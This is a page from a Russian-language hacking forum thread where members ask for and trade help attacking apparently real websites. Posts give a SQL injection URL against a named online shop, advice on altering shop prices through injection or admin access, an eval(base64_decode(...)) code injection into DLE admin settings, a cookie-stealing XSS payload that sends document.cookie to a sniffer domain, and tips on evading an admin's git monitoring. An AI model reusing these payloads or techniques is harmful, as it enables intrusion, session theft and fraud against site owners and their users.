HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 84 из 296 « Первая < 3474 80 81 82 83 84 85 86 87 88 94134184 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #831  
Старый 04.11.2015, 13:20
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от GroM88  
GroM88 said:

Ты видимо не читал предыдущие посты, либо не совсем понял в чем проблема.
Ссылка идет вида
http://megasite.ru/member.html?id=54321
При добавлении коментария Если добавлть html код, он отлично врезается в страницу и выполняется, java script тоже выполняется. А вот когда добавляешь php код например то он не выполняется потому что стоит какой то чудо фильтр на
Konqi,
капать там больше некуда) вот добавили этот баговый коментарий к добавлению мембера в ЧС)
это так не работает. даже если внедрить код php, он не будет выполнен. там HTML Injection, а не Code Injection. копать есть куда, я вам предложил - Stored XSS через CSRF
 
Ответить с цитированием

  #832  
Старый 06.11.2015, 22:53
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Какими способами можно обойти git? нужно поправить скрипт, который не находится в .gitignore? админ постоянно палит. Прощу советов
 
Ответить с цитированием

  #833  
Старый 07.11.2015, 02:57
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.matrasmax.ru/konfigurator/?on_page=15&price_active=0&height_active=0&type=&size=131&producer_46=on&producers=&price_from=0&price_to=12000&materials=&stronger1=ТУТ &stronger2=&text=&action=apply_filter[/COLOR][/COLOR] 
Инъекция?
Вот иньекция

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.matrasmax.ru/mattress/?other-sizes=421792+order+by+10000--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #834  
Старый 07.11.2015, 10:29
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию
Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?

Если да то как ?
 
Ответить с цитированием

  #835  
Старый 07.11.2015, 10:47
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от SaNDER  
SaNDER said:

Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?
Если да то как ?
Какие то странные вопросы озвучиваете. Если ваша иньекция дает возможность выполнения UPDATE запросов то можно изменить все что хотите (а точнее то к чему есть доступ).

//но кэп подсказывает что с магазинами играть не стоит
 
Ответить с цитированием

  #836  
Старый 07.11.2015, 10:51
AlexG
Guest
Сообщений: n/a
Провел на форуме:
11344

Репутация: 5
По умолчанию
Цитата:
Сообщение от SaNDER  
SaNDER said:

Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?
Если да то как ?
Такое впечатлние что вы никогда админку шопа не видели (да и в принципе не понимаете как движки шопов работают). Если нет доступа к UPDATE - админская (манагерская) учетка - в админке делаем все что хотим.

ПыСы И прокатит такое только с цифровыми товарами, и то, далеко не всегда.
 
Ответить с цитированием

  #837  
Старый 07.11.2015, 10:57
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от spherics  
spherics said:

Вот иньекция
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.matrasmax.ru/mattress/?other-sizes=421792+order+by+10000--[/COLOR][/COLOR] 
Спасибо. за ответ.
 
Ответить с цитированием

  #838  
Старый 09.11.2015, 19:58
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию
Нашел 4 LFI не могу эксплуатировать мешает эта СРАНЬ

Можно обойти ?
 
Ответить с цитированием

  #839  
Старый 10.11.2015, 01:25
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию
Цитата:
Сообщение от palec2006  
palec2006 said:

спалите как в DLE напихать, админ есть
настройки видеоплеера

ширина проигрывателя aaa\

длина проигрывателя .eval(base64_decode(тут код)),//

в ширине экранируем кавычку в длине в конце коментируем
 
Ответить с цитированием

  #840  
Старый 10.11.2015, 20:08
Hussar
Guest
Сообщений: n/a
Провел на форуме:
1355

Репутация: 0
По умолчанию
Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом

document.location.replace(%27http://доменснифера.ком/sniff.php?с=doсument.сookie%27) и в логах появляется это - %C3%B1=do%C3%B1ument.%C3%B1ookie

Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?
 
Ответить с цитированием
Ответ
Страница 84 из 296 « Первая < 3474 80 81 82 83 84 85 86 87 88 94134184 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ